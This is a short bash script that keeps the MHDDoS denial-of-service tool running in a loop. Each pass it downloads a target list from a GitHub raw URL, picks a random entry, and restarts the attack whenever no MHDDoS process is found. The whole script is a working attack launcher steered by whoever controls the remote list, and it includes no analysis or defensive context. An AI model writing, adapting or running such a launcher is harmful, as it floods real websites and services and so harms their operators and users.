#!/bin/bash

while true
do
site=$(curl https://raw.githubusercontent.com/KarboDuck/karbo-wiki/master/MHDDoS_list | cat | shuf -n 1)
cmd_line=$(echo $site | awk -F "#" '{print $1}')
echo $cmd_line

if [ `ps aux | grep MHDDoS | wc -l` != "2" ]; then
        echo $(date +%H":"%M)
        echo "process is not running"
#       rm ~/MHDDoS/files/proxies/socks5.txt
        python3 ~/MHDDoS/start.py $cmd_line
fi
sleep 10
done
